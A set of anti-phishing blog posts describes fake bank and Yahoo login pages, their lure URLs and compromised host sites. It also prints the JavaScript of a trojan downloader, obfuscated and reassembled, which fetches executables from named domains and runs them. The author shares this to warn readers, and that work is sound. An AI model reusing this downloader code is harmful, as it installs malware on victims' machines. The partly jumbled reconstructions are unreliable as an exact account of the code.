WordPress users, please use strong passwords

Just got phishing spam from bad guys pretending to the Bank of Ireland. Here’s the email:

Bank of Ireland Phishing

If you are fooled into clicking the link, you are redirected to:

http://personalbanking.bankofireland.obfusticated.com/ie/ie/authentication.html?e1s1

The “obfusticated” prevents anyone from actually going to the bad site, and protects the wordpress user whose website (“obfusticated.com”) has been compromised. For what it’s worth, I’ve done my best to warn the individual involved that there is a problem at their website.

The gateway page is below. It looks very official, but don’t let that fool you. It’s a fake.

Bank of Ireland Phishing 2

Then you get to give the criminals your login PIN:

Bank of Ireland Phishing 3

The malicious code appears to fail the first time and makes you re-enter the data. It doesn’t matter what you put in the second time, you’ll advance to the next page:

Bank of Ireland Phishing 4

Please be aware: BANKS WILL NEVER DO THIS. NEVER GIVE OUT SENSITIVE INFORMATION BY EMAIL OR ON THE WEB.

Next you are asked to hand the criminals your credit card password.

Bank of Ireland Phishing 5

Once they have your data – or in my case, a whole raft of obscenities – you are redirected to the real Bank of Ireland website.

If you have a WordPress blog (or any other website) please make sure you are using strong passwords. If bad guys get in, they can park malicious code in your web space and direct their victims there, not to mention steal whatever valuable data is there.

Never give out sensitive financial information over the web. If you suspect your accounts have truly been compromised or locked, call your bank directly and ask for verification.

Be careful out there.

The Old Wolf has spoken.

Phishing is still very much a thing. Please be careful.

This showed up in a business email account yesterday. Please note, I don’t have an acccount with US Bank, and the “To:” field has an address that is not mine. (click the image to enlarge)


Fraud 0

When you click on the “Login Here” link, if you’re silly enough to do so, this is what you get:

fraud 1

Biggest red flag: the web page you just got redirected to is not usbank.com but rather “http://judybruce.com/obfusticated/usbank.secure.account/” (Judy Bruce is an author, and for some reason her web page has been compromised by malefactors. I have done my best to notify her so she can get this infestation cleaned out.)

Followed by a request for your password:

Fraud 2

But wait, there’s more!

Fraud4

Really, people? You’re just going to give out your sensitive financial information to some random mailer on the internet?

But hey, if you’re going to do that, you might as well give the crooks access to your email account as well:

Fraud 3Fraud 5

Please be careful out there. A bank will never ask you to provide sensitive information of this nature via email or on the web. If you have doubts or questions, contact your financial institution directly before providing any information.

Please protect yourselves and your vulnerable loved ones.

The Old Wolf has spoken.

Not from Yahoo (scam)

yahoo

“Your Mail version is outdated.” “Upgrade your account now.”

Never follow links like this that ask you to enter your email username and password. Would you hand your credit card to a criminal? Don’t give access to your Yahoo, Gmail, Hotmail, or other accounts to scammers.

If  you have loved ones who are not especially tech-savvy, please protect them from this kind of jiggery-pokery.

Be safe out there.

The Old Wolf has spoken.

Order to Appear in Court

Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.

This time the Javascript code wants to go out to startick.com, mrflapper.com, and ihaveavoice2.com (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.

Here’s the email that this came attached to:

To: [edited]
Subject: Notice of appearance in Court #00928994

From: “District Court” <jimmie.cowan@138-172.static.hkit4u.com>

Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Jimmie Cowan,
Clerk of Court.
Attached: Notice_to_Appear_00928994.zip
That “notice to appear” attachment is actually a JavaScript file, and it came as garbage that looked like this:

function sah126() { return ’00) {‘; };  function sah125() { return ‘ == 2’; };  function sah210() { return ‘+fr+’; }; function sah86() { return ‘ar dn’; };  function sah105() { return ‘rea’; };  function sah95() { return ‘bj’; };

But as soon as the code runs, it concatenates all those little bits into something that looks like this:

var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function gvi() { return ‘e’; }

function sah() { return ‘val’; }

function dl(fr)l”); v { var b = “w’; };

ww.startick.com mrflapper.com ihaveavoice2.com”.split’; };

(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };’; };

try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”

for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);

I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.

The bad actors want access to your data and your computer, and they don’t care how they get it.

Be careful out there.

The Old Wolf has spoken.

An Illustration: Why you never open those attachments.

noattachments

I got two emails yesterday, each with an attachment. Both are designed to get people to open whatever malware package they are carrying:

To: [redacted]
Subject: Notice to appear in Court #00000554562

From: “District Court” <nathaniel.berger@realestate-philippines.net>

Notice to Appear,

This is to inform you to appear in the Court on the July 06 for your case hearing.
Please, do not forget to bring all the documents related to the case.
Note: The case will be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Kind regards,
Nathaniel Berger,
Clerk of Court.
Attached: 00000554562.zip

Subject: Indebtedness for driving on toll road #0000133433
To: [redacted]

From: “E-ZPass Manager” <calvin.gleason@adescbrasil.com.br>

Notice to Appear,
You have a unpaid bill for using toll road.
Please, do not forget to service your debt.
You can review the invoice in the attachment.
Sincerely,
Calvin Gleason,
E-ZPass Agent.
E-ZPass_0000133433.zip

Notice that the second email begins the same way: “Notice to appear,” even though it’s a notification of a supposed debt. These were clearly cut/pasted by the same person/group.

So let’s look at that attachment.

The E-Z Pass zip file contains a file called “E-ZPass_0000133433.doc.js.” This is a javascript file, and it was immediately quarantined by Microsoft Security Essentials and flagged as TrojanDownloader:JS/Nemucod.P. According to Microsoft, “This program displays deceptive program messages. It downloads and installs other programs onto your PC without your consent, including other malware.”

Clearly, you don’t want to mess with this on your machine. The body of the file looks like this:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;function igs118() { return ‘4 && ‘; };  function igs236() { return ‘);’; };  function igs101() { return ‘); x’; };  function igs193() { return ‘ x’; };  function igs232() { return ‘3862’; };  function igs3() { return ‘ dl’; };  function igs30() { return ‘i=’; };  function igs140() { return ‘a.ty’; };  function igs182() { return ‘} ‘; };  function igs74() { return ‘.rou’; };  function igs162() { return ‘1; x’; };  function igs23() { return ‘com”‘; };  function igs131() { return ‘ect(‘; };  function igs217() { return ‘ } c’; };  function igs228() { return ‘; dl(‘; };  function igs176() { return ‘{ ws’; };  function igs136() { return ‘”); x’; };  function igs141() { return ‘pe ‘; };  function igs97() { return ‘SXML2’; };  function igs192() { return ‘try {‘; };  function igs63() { return ‘(“‘; };  function igs50() { return ‘”);’; };  function igs229() { return ‘6001)’; };  function igs89() { return ‘ar x’; };  function igs66() { return ‘”)+’; };  function igs46() { return ‘WS’; };  function igs19() { return ‘ a’; };  function igs79() { return ‘m()*’; };  function igs186() { return ‘; };’; };  function igs28() { return ‘ (v’; };  function igs29() { return ‘ar ‘; };  function igs117() { return ‘e == ‘; };  function igs216() { return ‘nd();’; };  function igs185() { return ‘r) {}’; };  function igs113() { return ‘ (x’; };  function igs90() { return ‘o ‘; };  function igs72() { return ‘)+’; };  function igs70() { return ‘arCod’; };  function igs49() { return ‘ell’; };  function igs233() { return ‘); d’; };  function igs171() { return ‘ile(‘; };  function igs201() { return ‘]+”/d’; };  function igs166() { return ‘ 0; x’; };  var ci = ”;  function igs127() { return ‘ new ‘; };  function igs40() { return ‘s =’; };  function igs219() { return ‘h ‘; };  function igs206() { return ‘nd=”+’; };  function igs61() { return ‘rin’; };  function igs22() { return ‘ge.’; };  function igs102() { return ‘o.o’; };  function igs138() { return ‘pen’; };  function igs14() { return ‘cl’; };  function igs111() { return ‘n()’; };  function igs10() { return ‘so’; };  function igs48() { return ‘.Sh’; };  function igs51() { return ‘ v’; };  function igs98() { return ‘.XMLH’; };  function igs167() { return ‘a.’; };  function igs17() { return ‘etqy’; };  function igs42() { return ‘Ac’; };  function igs194() { return ‘o.’; };  function igs129() { return ‘eX’; };  function igs137() { return ‘a.o’; };  function igs91() { return ‘= ‘; };  function igs144() { return ‘a.’; };  function igs159() { return ‘ { d’; };  function igs45() { return ‘t(“‘; };  function igs2() { return ‘ion’; };  function igs92() { return ‘new’; };  function igs18() { return ‘.com’; };  function igs106() { return ‘atec’; };  function igs8() { return ‘”dick’; };  function igs65() { return ‘P%’; };  function igs147() { return ‘e(xo’; };  function igs68() { return ‘g.f’; };  function igs75() { return ‘nd’; };  function igs24() { return ‘.spli’; };  function igs200() { return ‘”+b[i’; };  function igs47() { return ‘cript’; };  function igs227() { return ‘ } }’; };  function igs179() { return ‘n,’; };  function igs161() { return ‘= ‘; };  function igs187() { return ‘ xa’; };  function igs67() { return ‘Strin’; };  function igs34() { return ‘leng’; };  function igs27() { return ‘for’; };  function igs143() { return ‘; x’; };  function igs199() { return ‘tp://’; };  function igs35() { return ‘th; ‘; };  function igs177() { return ‘.R’; };  function igs39() { return ‘ w’; };  function igs4() { return ‘(fr’; };  function igs153() { return ‘f (‘; };  function igs189() { return ‘ose(‘; };  function igs115() { return ‘ead’; };  function igs33() { return ‘b.’; };  function igs1() { return ‘funct’; };  function igs146() { return ‘it’; };  function igs44() { return ‘Objec’; };  function igs145() { return ‘wr’; };  function igs38() { return ‘ var’; };  function igs11() { return ‘nw’; };  function igs108() { return ‘e ‘; };  function igs94() { return ‘ve’; };  function igs205() { return ‘p?r’; };  function igs169() { return ‘veT’; };  function igs174() { return ‘); tr’; };  function igs16() { return ‘om ‘; };  function igs105() { return ‘dyst’; };  function igs170() { return ‘oF’; };  function igs83() { return ‘)+”.e’; };  function igs230() { return ‘; d’; };  function igs78() { return ‘rando’; };  function igs149() { return ‘spo’; };  function igs21() { return ‘na’; };  function igs37() { return ‘+) {‘; };  function igs203() { return ‘ume’; };  function igs125() { return ‘ xa’; };  function igs76() { return ‘(Ma’; };  function igs41() { return ‘ new ‘; };  function igs188() { return ‘.cl’; };  function igs134() { return ‘.St’; };  function igs80() { return ‘10000’; };  function igs116() { return ‘yStat’; };  function igs150() { return ‘ns’; };  function igs135() { return ‘ream’; };  function igs114() { return ‘o.r’; };  function igs96() { return ‘ct(“M’; };  function zuw() { return ‘e’; };  function igs215() { return ‘.se’; };  function igs139() { return ‘(); x’; };  function igs62() { return ‘gs’; };  function igs130() { return ‘Obj’; };  function igs222() { return ‘; if ‘; };  function igs218() { return ‘atc’; };  function igs133() { return ‘ODB’; };  function igs207() { return ‘fr+”&’; };  function igs123() { return ‘200) ‘; };  function igs202() { return ‘oc’; };  function igs6() { return ‘var ‘; };  function igs152() { return ‘); i’; };  function igs198() { return ‘”,”ht’; };  function igs148() { return ‘.Re’; };  function igs221() { return ‘) {}’; };  function igs25() { return ‘t(” “‘; };  function igs234() { return ‘l(‘; };  function igs100() { return ‘P”‘; };  function igs209() { return ‘=”+s’; };  function igs165() { return ‘ion =’; };  function igs204() { return ‘nt.ph’; };  function igs104() { return ‘ea’; };  function igs55() { return ‘.Expa’; };  function igs112() { return ‘ { if’; };  function igs99() { return ‘TT’; };  function igs5() { return ‘) { ‘; };  function igs12() { return ‘res’; };  function igs178() { return ‘un(f’; };  function igs87() { return ‘ = ‘; };  function igs195() { return ‘op’; };  function igs85() { return ‘; v’; };  function igs214() { return ‘ xo’; };  function igs224() { return ‘ == 1’; };  function igs226() { return ‘reak;’; };  function igs223() { return ‘(dn’; };  function igs124() { return ‘{ var’; };  function igs196() { return ‘en(“G’; };  function igs95() { return ‘XObje’; };  function igs31() { return ‘0; ‘; };  function igs15() { return ‘ub.c’; };  function igs126() { return ‘ =’; };  function igs54() { return ‘ ws’; };  function igs73() { return ‘Math’; };  function igs82() { return ’00’; };  function igs231() { return ‘l(‘; };  function igs119() { return ‘xo.s’; };  function igs107() { return ‘hang’; };  function igs86() { return ‘ar dn’; };  function igs190() { return ‘); }’; };  function igs155() { return ‘.si’; };  function igs213() { return ‘e);’; };  function igs58() { return ‘onm’; };  function igs7() { return ‘b = ‘; };  function igs208() { return ‘id’; };  function igs120() { return ‘ta’; };  function igs121() { return ‘tu’; };  function igs88() { return ‘0; v’; };  function igs71() { return ‘e(92’; };  function igs84() { return ‘xe”‘; };  function igs36() { return ‘i+’; };  function igs122() { return ‘s == ‘; };  function igs109() { return ‘= fu’; };  function igs69() { return ‘romCh’; };  function igs56() { return ‘ndEnv’; };  function igs64() { return ‘%TEM’; };  function igs212() { return ‘als’; };  function igs110() { return ‘nctio’; };  function igs103() { return ‘nr’; };  function igs164() { return ‘posit’; };  function igs173() { return ‘,2’; };  function igs225() { return ‘) b’; };  function igs53() { return ‘fn =’; };  function igs157() { return ‘> 500’; };  function igs151() { return ‘eBody’; };  function igs175() { return ‘y ‘; };  function igs9() { return ‘in’; };  function igs13() { return ‘tling’; };  function igs154() { return ‘xa’; };  function igs32() { return ‘i<‘; };  function igs59() { return ‘ent’; };  function igs172() { return ‘fn’; };  function igs() { return ‘val’; };  function igs142() { return ‘= 1′; };  function igs81() { return ’00’; };  function igs180() { return ‘1,’; };  function igs57() { return ‘ir’; };  function igs43() { return ‘tiveX’; };  function igs60() { return ‘St’; };  function igs160() { return ‘n ‘; };  function igs191() { return ‘; }; ‘; };  function igs183() { return ‘catch’; };  function igs77() { return ‘th.’; };  function igs52() { return ‘ar ‘; };  function igs235() { return ‘8083’; };  function igs163() { return ‘a.’; };  function igs181() { return ‘0); ‘; };  function igs132() { return ‘”AD’; };  function igs156() { return ‘ze ‘; };  function igs197() { return ‘ET’; };  function igs128() { return ‘Activ’; };  function igs20() { return ‘volo’; };  function igs211() { return ‘, f’; };  function igs93() { return ‘ Acti’; };  function igs168() { return ‘sa’; };  function igs158() { return ‘0)’; };  function igs26() { return ‘); ‘; };  function igs210() { return ‘troke’; };  function igs184() { return ‘ (e’; };  function igs220() { return ‘(er’; }; for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

The last statement in the program concatenates all these little scraps of code (listed out of order) into one large statement and then executes it:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;
{ return valfunction dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com avolonage.com”.split(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; x; }; var ci = ;
a.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(6001); dl(3862); dl(8083);zuwe
for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

Now I’m not a Javascript coder, but I can tell just by looking at it that this will access several compromised or outright malicious websites out there, and then download and run other files which are guaranteed to make your life miserable. At the least, you’ll get advertisements and popups. At worst, you will lose all your data in horrible ways or become part of a spamming network of zombie computers, or have your identity and your financial information stolen and used by criminals. None of these things are appealing.

To protect yourself, these two rules should be followed at all times:

  1. Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  2. Be suspicious of attachments, and only open those that you are expecting.

There are others, but if everyone would follow these two basic common-sense procedures, the bad actors would have far less access to people’s machines and data.

Protect your loved ones, and be careful out there.

The Old Wolf has spoken.

Protect yourself from Phishing attacks

nophishing

Great advice from a local business:

  • Be suspicious of any email that requires “immediate action” or creates a sense of urgency. This is a common technique used by criminals to rush people into making a mistake.
  • Be suspicious of emails addressed to “Dear Customer” or some other generic salutation. If it is your bank, they will know your name.
  • Be suspicious of grammar or spelling mistakes; most businesses proofread their messages carefully before sending them.
  • Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  • Hover your mouse over the link. This will show you the true destination where you would go if you actually clicked on it. If the true destination of the link is different than what is shown in the email, this may be an indication of fraud.
  • Be suspicious of attachments, and only open those that you are expecting.
  • Just because you got an email from your friend does not mean they sent it. Your friend’s computer may have been infected or their account may have been compromised, and malware is sending the email to all of your friend’s contacts.
  • If you get a suspicious email from a trusted friend or colleague, call them to confirm that they sent it. Always use a telephone number that you already know or can independently verify, not one that was included in the message.

I’ve mentioned most of these in various other posts, but this was an excellent summary that deserved to be shared. Be careful out there.

The Old Wolf has spoken.

Never “Verify Your Email.”

No email service will send you a message asking you to provide your address and password, or other financial data. They just won’t.

yahoo

This email is bogus. Note the red circle next to the “click to validate” link – that’s a warning from WOT (Web of Trust) that indicates the website is not to be trusted.

If you’re foolish enough to click the link, which goes to http://bookinghh.myfreesitehost.com/smluptt/wadohjom.htm (NOT a Yahoo website), you’ll get this:

Yahoo2

If you fill out this information, scammers now have access to your email account, and they will use it to steal information or send out criminal spam.

Never do this. Be careful out there.

The Old Wolf has spoken.